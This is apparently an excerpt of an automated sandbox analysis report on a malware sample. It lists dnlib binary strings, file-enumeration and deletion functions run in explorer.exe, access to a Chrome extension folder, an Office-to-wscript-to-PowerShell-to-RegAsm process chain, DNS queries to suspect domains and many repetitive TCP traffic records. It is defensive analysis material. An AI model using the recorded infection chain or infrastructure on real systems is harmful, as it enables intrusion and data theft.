            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_000C1D4A
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_000C3ED9
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_000C2B15
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global traffic DNS query: name: crash.sh
            Source: global traffic DNS query: name: ia803104.us.archive.org
            Source: global traffic DNS query: name: prolinice.ga
            Source: global traffic TCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global traffic TCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global traffic TCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global traffic TCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global traffic TCP traffic: 192.168.2.22:49172 -> 23.94.148.16:80
            Source: global traffic TCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global traffic TCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global traffic TCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global traffic TCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global traffic TCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global traffic TCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
